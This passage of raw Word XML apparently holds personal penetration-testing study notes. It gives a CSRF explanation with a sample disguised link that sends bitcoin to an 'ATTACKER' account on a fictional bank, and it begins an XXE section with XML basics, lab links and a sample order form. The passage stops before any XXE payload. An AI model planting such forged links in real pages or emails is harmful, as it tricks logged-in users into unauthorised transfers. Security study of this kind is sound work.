      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nsq519jszunu" w:id="386"/>
      <w:bookmarkEnd w:id="386"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF (Cross-Site-Request-Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the OSCP Book:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCA">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A CSRF attack occurs via social engineering in which the victim clicks on a malicious link that performs a preconfigured action on behalf of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The malicious link could be disguised by an apparently harmless description, often luring the victim to click on it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a href="http://fakecryptobank.com/send_btc?account=ATTACKER&amp;amount=100000""&gt;Check out these awesome cat memes!&lt;/a&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the above example, the URL link is pointing to a Fake Crypto Bank website API, which performs a bitcoin transfer to the attacker account. If this link was embedded into the HTML code of an email, the user would be only able to see the link description, but not the actual HTTP resource it is pointing to. This attack would be successful if the user is already logged in with a valid session on the same website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8unuhmwyqzq2" w:id="387"/>
      <w:bookmarkEnd w:id="387"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE (XML External Entity)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practiced on the Markup Tier 2 Starting point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId936">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">In-depth guide can be found on HackTricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId937">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Portswigger XXE Lab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XML:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XML is a markup language designed for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data storage and transport</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some simple XML code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;to&gt;Alice&lt;/to&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;from&gt;Bob&lt;/from&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;message&gt;Hello, this is a test XML document!&lt;/message&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;date&gt;2024-11-20&lt;/date&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="712"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Declares that this is an XML document and specifies the version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Element &lt;note&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All XML documents must have one root element that contains everything.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Child Elements</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;to&gt;, &lt;from&gt;, &lt;message&gt;, and &lt;date&gt; are nested inside the root element.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key-Value Structure:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each element has a tag and its corresponding value (e.g., &lt;to&gt;Alice&lt;/to&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test for XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you send a request after inputting some values, and you see some XML code, then you can try XXE. For example take this example below. Assume you have a form with 3 values: quantity, item, and address. The XML might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version = "1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BF9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;order&gt;&lt;quantity&gt;10&lt;/quantity&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;item&gt;Home Appliances&lt;/item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;address&gt;Test address&lt;/address&gt;&lt;/order&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
